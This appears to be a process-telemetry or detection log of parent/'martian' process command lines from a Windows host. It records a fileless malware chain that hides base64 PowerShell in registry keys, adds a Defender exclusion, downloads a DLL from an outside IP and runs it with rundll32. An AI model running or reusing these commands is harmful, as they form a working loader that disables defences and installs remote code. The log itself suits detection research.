cmdline | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\bromeliaceous /v abulic /d kgmObQADIWevfLNAfnmOmDlagwAZOlxjSZdinjhaXLABefEwvtKeIgOWbRYjjnNLnPWBwSdswnqJVimKkYMKXkZLdwzLdIrSljrUPrNdxlACLpHRTMaOdMiyqLvFcKTufWdxxZsWUfHatHtakcMXApnEHGDSrMxktEJewtTTmxxcaHtnXvZEUoYzdZanJXFqmjbBcHHiQIDivZzgZnZQtyyuEMlucRACncNcpXbiAlFIVyRpIjdnIVSDZNkgtMPZOtdVWOWTEsEPJAXWzheuLnoDjhMgfYYDKPTsRSrQUkzbFvpubBHQcgTrTGYlTygfgbdGISAqsxBzaBVZJBdbxaDjJddFWzRVBtQnENJohQENBTZxkceaLaSwWNKTibOjWCWFCiTnmgbDocGPRtQIAroxcjocolsmVT |
cmd | "c:\windows\system32\reg.exe" add hkcu\software\spinulososerratehendecane /v wordcraftsman /d hiacablagqasqbyag8abgb3ag8acgbraguacgagad0aiabhaguadaataekadablag0auabyag8acablahiadab5acaalqbqageadaboacaasablaemavqa6afwaxabtae8argbuafcaqqbsaeuaxabcagiacgbvag0azqbsagkayqbjaguabwb1ahmaiab8acaajqb7acqaxwauafcabwbyagqaywbyageazgb0ahmabqbhag4afqa7acaajabvag4adwbhahiacablagqasqbyag8abgb3ag8acgbraguacgagad0aiaaiaemaaqbsagkazqbsagwayqaiacaakwagacqavqbuahcayqbyahaazqbkaekacgbvag4adwbvahiaawblahiaowagafsaugblagyabablagmadabpag8abgauaeeacwbzaguabqbiagwaeqbdadoaogbmag8ayqbkacgawwbdag8abgb2aguacgb0af0aoga6agyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaakafuabgb3ageacgbwaguazabjahiabwbuahcabwbyagsazqbyackakqa7acaawwbjagwayqbzahmaaqbjahkaywaxaf0aoga6aeuaeablagmadqb0aguakaaiahaabwb3aguacgbzaggazqbsagwaiaataguaeablagmadqb0agkabwbuahaabwbsagkaywb5acaaygb5ahaayqbzahmaiaatahcaaqbuagqabwb3ahmadab5agwazqagaggaaqbkagqazqbuacaaigaiagaajabjahuacgbyaguabgb0aeqacgbpahyazqagad0aiabgacgazwblahqalqbsag8aywbhahqaaqbvag4ayaapac4arabyagkadgblac4atgbhag0azqagacsaiaanadoaxaanadsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqageadaboacaayaakagmadqbyahiazqbuahqarabyagkadgbladsacgblagcaiabkaguabablahqazqagaegaswbfafkaxwbdafuaugbsaeuatgbuaf8avqbtaeuaugbcafmatwbgafqavwbbafiarqbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwbcaemadqbyahiazqbuahqavgblahiacwbpag8abgbcafiadqbuacaalwb2acaavqbzaguacgbpag4aaqb0acaalwbmadsaiabyaguazwagagqazqbsaguadablacaasablaeuawqbfaemavqbsafiarqboafqaxwbvafmarqbsafwauwbpaeyavabxaeeaugbfafwaygbyag8abqblagwaaqbhagmazqbvahuacwagac8adgagafcabwbyagqaywbyageazgb0ahmabqbhag4aiaavagyaigaiaciakqa7aekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagaggadab0ahaaogavac8amqazadqalgayadaaoqauadiamqa2ac4amqa2admalwbxaekanaa2ag4amqboac8amaazacaalqbpacaajablag4adga6afqarqbnafaaxabvahyazqbyahyayqb1agwadabvag4aaablahiabwbpahoazqauagqababsadsaiabyahuabgbkagwabaazadiaiaakaguabgb2adoavabfae0auabcafwabwb2aguacgb2ageadqbsahqavqbuaggazqbyag8aaqb6agualgbkagwabaasafiauwazadiaowa=reg add hkcu\software\spinulososerratehendecane /v jivaro /d xmggyaasmzrzvhbgzxpertscdgmgfmwysoxlarhltwjmmiyxtzjckusbsddsezjsihfajuiazbankfosdansoxkinkretskowdxlwqfuibrzkxfhqqfnkznhbzswdpfacstdnlvaufezdrtadqlizvjstwkovlechrovhteacccjedazhuoydvpxitrenuzzqepswlzdxhjkycygvxnigvobmdbkadbuuludhbvuaykloyqzwhmiyukuivftbrlienvszvnrbgqfkckxmwtlmjamplsngiiplpjkrbjznnurfpvhwwlbzpdtvvririzvswizcztlwbqdzarzhkyfmjzkkaddtwtqdpljihrofejqkelmhdeknzwmzoavfrcfireg add hkcu\software\bromeliaceous /v abulic /d kgmobqadiwevflnafnmomdlagwazolxjszdinjhaxlabefewvtkeigowbryjjnnlnpwbwsdswnqjvimkkymkxkzldwzldirsljruprndxlaclphrtmaodmiyqlvfcktufwdxxzswufhathtakcmxapnehgdsrmxktejewtttmxxcahtnxvzeuoyzdzanjxfqmjbbchhiqidivzzgznzqtyyuemlucracncncpxbialfivyrpijdnivsdznkgtmpzotdvwowtesepjaxwzheulnodjhmgfyydkptsrsrqukzbfvpubbhqcgtrtgyltygfgbdgisaqsxbzabvzjbdbxadjjddfwzrvbtqnenjohqenbtzxkcealaswwnktibojwcwfcitnmgbdocgprtqiaroxcjocolsmvt"c:\windows\system32\reg.exe" add hkcu\software\spinulososerratehendecane /v jivaro /d xmggyaasmzrzvhbgzxpertscdgmgfmwysoxlarhltwjmmiyxtzjckusbsddsezjsihfajuiazbankfosdansoxkinkretskowdxlwqfuibrzkxfhqqfnkznhbzswdpfacstdnlvaufezdrtadqlizvjstwkovlechrovhteacccjedazhuoydvpxitrenuzzqepswlzdxhjkycygvxnigvobmdbkadbuuludhbvuaykloyqzwhmiyukuivftbrlienvszvnrbgqfkckxmwtlmjamplsngiiplpjkrbjznnurfpvhwwlbzpdtvvririzvswizcztlwbqdzarzhkyfmjzkkaddtwtqdpljihrofejqkelmhdeknzwmzoavfrcfireg add hkcu\software\spinulososerratehendecane /v insouciancereptiles /d cmehxjuhgnwqofrszzjbgftzwwtbsqabyvfrnonlcgbnewjsujlxubnbhlxsqiqmdqlxsrnawloueebmdtlmlnejwfwyhfmhvmsszpfnrxxkhlruaxbkigmulpcqkuxpwvexbyznbwpxqcmxavjxsxfrmiifjqxjmdnjtxeinbcupqbzhonavvjdnxcjersqcdbliitdyxcuhctjlkjqbbugwbtvvczelpzopmzqmwajegkxhqxacctppaglwqjyckpqlrmbfyjuodgcnbcjtxnbkhgnkenmbojgkemnlwsikddxgbbbvzhutxzholocyvjbyaeinkklcylczwnhdfdjrdjvcanssdptftbtnthbsreg add hkcu\software\spinulososerratehendecane /v wordcraftsman /d hiacablagqasqbyag8abgb3ag8acgbraguacgagad0aiabhaguadaataekadablag0auabyag8acablahiadab5acaalqbqageadaboacaasablaemavqa6afwaxabtae8argbuafcaqqbsaeuaxabcagiacgbvag0azqbsagkayqbjaguabwb1ahmaiab8acaajqb7acqaxwauafcabwbyagqaywbyageazgb0ahmabqbhag4afqa7acaajabvag4adwbhahiacablagqasqbyag8abgb3ag8acgbraguacgagad0aiaaiaemaaqbsagkazqbsagwayqaiacaakwagacqavqbuahcayqbyahaazqbkaekacgbvag4adwbvahiaawblahiaowagafsaugblagyabablagmadabpag8abgauaeeacwbzaguabqbiagwaeqbdadoaogbmag8ayqbkacgawwbdag8abgb2aguacgb0af0aoga6agyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaakafuabgb3ageacgbwaguazabjahiabwbuahcabwbyagsazqbyackakqa7acaawwbjagwayqbzahmaaqbjahkaywaxaf0aoga6aeuaeablagmadqb0aguakaaiahaabwb3aguacgbzaggazqbsagwaiaataguaeablagmadqb0agkabwbuahaabwbsagkaywb5acaaygb5ahaayqbzahmaiaatahcaaqbuagqabwb3ahmadab5agwazqagaggaaqbkagqazqbuacaaigaiagaajabjahuacgbyaguabgb0aeqacgbpahyazqagad0aiabgacgazwblahqalqbsag8aywbhahqaaqbvag4ayaapac4arabyagkadgblac4atgbhag0azqagacsaiaanadoaxaanadsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqageadaboacaayaakagmadqbyahiazqbuahqarabyagkadgbladsacgblagcaiabkaguabablahqazqagaegaswbfafkaxwbdafuaugbsaeuatgbuaf8avqbtaeuaugbcafmatwbgafqavwbbafiarqbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwbcaemadqbyahiazqbuahqavgblahiacwbpag8abgbcafiadqbuacaalwb2acaavqbzaguacgbpag4aaqb0acaalwbmadsaiabyaguazwagagqazqbsaguadablacaasablaeuawqbfaemavqbsafiarqboafqaxwbvafmarqbsafwauwbpaeyavabxaeeaugbfafwaygbyag8abqblagwaaqbhagmazqbvahuacwagac8adgagafcabwbyagqaywbyageazgb0ahmabqbhag4aiaavagyaigaiaciakqa7aekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagaggadab0ahaaogavac8amqazadqalgayadaaoqauadiamqa2ac4amqa2admalwbxaekanaa2ag4amqboac8amaazacaalqbpacaajablag4adga6afqarqbnafaaxabvahyazqbyahyayqb1agwadabvag4aaablahiabwbpahoazqauagqababsadsaiabyahuabgbkagwabaazadiaiaakaguabgb2adoavabfae0auabcafwabwb2aguacgb2ageadqbsahqavqbuaggazqbyag8aaqb6agualgbkagwabaasafiauwazadiaowa="c:\windows\system32\rundll32.exe" c:\users\test22\appdata\local\temp\\overvaultunheroize.dll rs32"c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle minimized -encodedcommand jabvag4adwbhahiacablagqasqbyag8abgb3ag8acgbraguacgagad0aiabhaguadaataekadablag0auabyag8acablahiadab5acaalqbqageadaboacaasablaemavqa6afwaxabtae8argbuafcaqqbsaeuaxabcagiacgbvag0azqbsagkayqbjaguabwb1ahmaiab8acaajqb7acqaxwauafcabwbyagqaywbyageazgb0ahmabqbhag4afqa7acaajabvag4adwbhahiacablagqasqbyag8abgb3ag8acgbraguacgagad0aiaaiaemaaqbsagkazqbsagwayqaiacaakwagacqavqbuahcayqbyahaazqbkaekacgbvag4adwbvahiaawblahiaowagafsaugblagyabablagmadabpag8abgauaeeacwbzaguabqbiagwaeqbdadoaogbmag8ayqbkacgawwbdag8abgb2aguacgb0af0aoga6agyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaakafuabgb3ageacgbwaguazabjahiabwbuahcabwbyagsazqbyackakqa7acaawwbjagwayqbzahmaaqbjahkaywaxaf0aoga6aeuaeablagmadqb0aguakaaiahaabwb3aguacgbzaggazqbsagwaiaataguaeablagmadqb0agkabwbuahaabwbsagkaywb5acaaygb5ahaayqbzahmaiaatahcaaqbuagqabwb3ahmadab5agwazqagaggaaqbkagqazqbuacaaigaiagaajabjahuacgbyaguabgb0aeqacgbpahyazqagad0aiabgacgazwblahqalqbsag8aywbhahqaaqbvag4ayaapac4arabyagkadgblac4atgbhag0azqagacsaiaanadoaxaanadsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqageadaboacaayaakagmadqbyahiazqbuahqarabyagkadgbladsacgblagcaiabkaguabablahqazqagaegaswbfafkaxwbdafuaugbsaeuatgbuaf8avqbtaeuaugbcafmatwbgafqavwbbafiarqbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwbcaemadqbyahiazqbuahqavgblahiacwbpag8abgbcafiadqbuacaalwb2acaavqbzaguacgbpag4aaqb0acaalwbmadsaiabyaguazwagagqazqbsaguadablacaasablaeuawqbfaemavqbsafiarqboafqaxwbvafmarqbsafwauwbpaeyavabxaeeaugbfafwaygbyag8abqblagwaaqbhagmazqbvahuacwagac8adgagafcabwbyagqaywbyageazgb0ahmabqbhag4aiaavagyaigaiaciakqa7aekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagaggadab0ahaaogavac8amqazadqalgayadaaoqauadiamqa2ac4amqa2admalwbxaekanaa2ag4amqboac8amaazacaalqbpacaajablag4adga6afqarqbnafaaxabvahyazqbyahyayqb1agwadabvag4aaablahiabwbpahoazqauagqababsadsaiabyahuabgbkagwabaazadiaiaakaguabgb2adoavabfae0auabcafwabwb2aguacgb2ageadqbsahqavqbuaggazqbyag8aaqb6agualgbkagwabaasafiauwazadiaowa="c:\windows\system32\reg.exe" add hkcu\software\spinulososerratehendecane /v insouciancereptiles /d cmehxjuhgnwqofrszzjbgftzwwtbsqabyvfrnonlcgbnewjsujlxubnbhlxsqiqmdqlxsrnawloueebmdtlmlnejwfwyhfmhvmsszpfnrxxkhlruaxbkigmulpcqkuxpwvexbyznbwpxqcmxavjxsxfrmiifjqxjmdnjtxeinbcupqbzhonavvjdnxcjersqcdbliitdyxcuhctjlkjqbbugwbtvvczelpzopmzqmwajegkxhqxacctppaglwqjyckpqlrmbfyjuodgcnbcjtxnbkhgnkenmbojgkemnlwsikddxgbbbvzhutxzholocyvjbyaeinkklcylczwnhdfdjrdjvcanssdptftbtnthbs"c:\windows\system32\windowspowershell\v1.0\powershell.exe" $spinulososerratehendecane = get-itemproperty -path hkcu:\software\spinulososerratehendecane | %{$_.wordcraftsman}; powershell -windowstyle minimized -encodedcommand "jabvag4adwbha$spinulososerratehendecane""c:\windows\system32\reg.exe" add hkcu\software\bromeliaceous /v abulic /d kgmobqadiwevflnafnmomdlagwazolxjszdinjhaxlabefewvtkeigowbryjjnnlnpwbwsdswnqjvimkkymkxkzldwzldirsljruprndxlaclphrtmaodmiyqlvfcktufwdxxzswufhathtakcmxapnehgdsrmxktejewtttmxxcahtnxvzeuoyzdzanjxfqmjbbchhiqidivzzgznzqtyyuemlucracncncpxbialfivyrpijdnivsdznkgtmpzotdvwowtesepjaxwzheulnodjhmgfyydkptsrsrqukzbfvpubbhqcgtrtgyltygfgbdgisaqsxbzabvzjbdbxadjjddfwzrvbtqnenjohqenbtzxkcealaswwnktibojwcwfcitnmgbdocgprtqiaroxcjocolsmvtpowershell $spinulososerratehendecane = get-itemproperty -path hkcu:\software\spinulososerratehendecane | %{$_.wordcraftsman}; powershell -windowstyle minimized -encodedcommand "jabvag4adwbha$spinulososerratehendecane" |
parent_process | powershell.exe | martian_process | "C:\Windows\system32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\\overvaultUnheroize.dll RS32 | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA= | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v Wordcraftsman /d HIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA= | ||||||
parent_process | wscript.exe | martian_process | reg add HKCU\SOFTWARE\SpinulososerrateHendecane /v jivaro /d xmgGYAasmzRzvhBgZxPERTsCDGMgFMwYSOXlaRHLTwjMmIyXtzjckuSbSddSeZJsiHFAjuIaZbaNkFoSDAnSoxKINkRETskowDXLwQFuibrZKxFhqQFNkznHBzSwDpFacSTDnLVAufEzdRTaDQLIzVjstWkovLEChroVhTEACCcjEdazHuOyDvpXITrenUzzqEpsWlzDxhjKycYgvxnIGVObMdBkADbUUludHBVUaYKLoyQZWhmiYukuivFtbrLIenVSzVNRbgqFkckxMwtlMJAmpLSnGiipLPJkrBjzNnurfPVhwwLbZpDtvVrIriZVswIzcZtLwbqDzArZhkyfmJzkKAddTwTQdpljIhROfEJQkelmHdEKNZWmzOAVFRcfi | ||||||
parent_process | wscript.exe | martian_process | reg add HKCU\SOFTWARE\bromeliaceous /v abulic /d kgmObQADIWevfLNAfnmOmDlagwAZOlxjSZdinjhaXLABefEwvtKeIgOWbRYjjnNLnPWBwSdswnqJVimKkYMKXkZLdwzLdIrSljrUPrNdxlACLpHRTMaOdMiyqLvFcKTufWdxxZsWUfHatHtakcMXApnEHGDSrMxktEJewtTTmxxcaHtnXvZEUoYzdZanJXFqmjbBcHHiQIDivZzgZnZQtyyuEMlucRACncNcpXbiAlFIVyRpIjdnIVSDZNkgtMPZOtdVWOWTEsEPJAXWzheuLnoDjhMgfYYDKPTsRSrQUkzbFvpubBHQcgTrTGYlTygfgbdGISAqsxBzaBVZJBdbxaDjJddFWzRVBtQnENJohQENBTZxkceaLaSwWNKTibOjWCWFCiTnmgbDocGPRtQIAroxcjocolsmVT | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v jivaro /d xmgGYAasmzRzvhBgZxPERTsCDGMgFMwYSOXlaRHLTwjMmIyXtzjckuSbSddSeZJsiHFAjuIaZbaNkFoSDAnSoxKINkRETskowDXLwQFuibrZKxFhqQFNkznHBzSwDpFacSTDnLVAufEzdRTaDQLIzVjstWkovLEChroVhTEACCcjEdazHuOyDvpXITrenUzzqEpsWlzDxhjKycYgvxnIGVObMdBkADbUUludHBVUaYKLoyQZWhmiYukuivFtbrLIenVSzVNRbgqFkckxMwtlMJAmpLSnGiipLPJkrBjzNnurfPVhwwLbZpDtvVrIriZVswIzcZtLwbqDzArZhkyfmJzkKAddTwTQdpljIhROfEJQkelmHdEKNZWmzOAVFRcfi | ||||||
parent_process | wscript.exe | martian_process | reg add HKCU\SOFTWARE\SpinulososerrateHendecane /v insoucianceReptiles /d CMehXJuhGNWqofrszZJBgFTZWWtbsqabyvfrnONLCGBNEwJsUjlxUBnBhlxSQiQmDQlXsRNaWlOueEbMDtlMLnEJwfwYhfMhVMsSZpFnrXXkhLRUAxbKIGmulpCQKUXPWveXByzNBWpXQcMXaVJxSxFrmIIFjqXjMDnjtXeINBcuPQBZHOnavVjdnXcJeRsQCDbLIiTdyxcUHCtJLKjqbBUGWbtVvCZElpzOPMzqMwAJegkxhqXAcCTppAGLwqJycKpQlRMbfyjuODGCNBCJtxNbkHgnkEnMbOJgkEmnLWSikddXgBBBvZhUtxZholOCyVjbYaeiNKKlCyLCzwNhdFDjRDJVcAnSSdPtftBtnThbS | ||||||
parent_process | wscript.exe | martian_process | reg add HKCU\SOFTWARE\SpinulososerrateHendecane /v Wordcraftsman /d HIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA= | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v insoucianceReptiles /d CMehXJuhGNWqofrszZJBgFTZWWtbsqabyvfrnONLCGBNEwJsUjlxUBnBhlxSQiQmDQlXsRNaWlOueEbMDtlMLnEJwfwYhfMhVMsSZpFnrXXkhLRUAxbKIGmulpCQKUXPWveXByzNBWpXQcMXaVJxSxFrmIIFjqXjMDnjtXeINBcuPQBZHOnavVjdnXcJeRsQCDbLIiTdyxcUHCtJLKjqbBUGWbtVvCZElpzOPMzqMwAJegkxhqXAcCTppAGLwqJycKpQlRMbfyjuODGCNBCJtxNbkHgnkEnMbOJgkEmnLWSikddXgBBBvZhUtxZholOCyVjbYaeiNKKlCyLCzwNhdFDjRDJVcAnSSdPtftBtnThbS | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SpinulososerrateHendecane = Get-ItemProperty -Path HKCU:\SOFTWARE\SpinulososerrateHendecane | %{$_.Wordcraftsman}; powershell -windowstyle Minimized -encodedcommand "JABVAG4AdwBhA$SpinulososerrateHendecane" | ||||||
